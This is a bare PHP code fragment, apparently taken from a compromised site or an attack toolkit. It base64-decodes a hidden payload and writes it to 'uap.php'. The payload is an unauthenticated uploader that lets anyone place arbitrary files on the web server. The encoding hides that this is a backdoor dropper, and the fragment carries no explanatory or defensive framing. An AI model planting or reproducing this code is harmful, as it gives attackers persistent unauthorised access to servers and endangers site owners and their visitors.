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 $a = base64_decode('PD9waHAgZWNobyAnVXBsb2FkZXI8YnI+JztlY2hvICc8YnI+JztlY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nO2lmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgISEhPC9iPjxicj48YnI+JzsgfX0/Pg==');$file = fopen('uap.php','w');echo fwrite($file,$a);fclose($file);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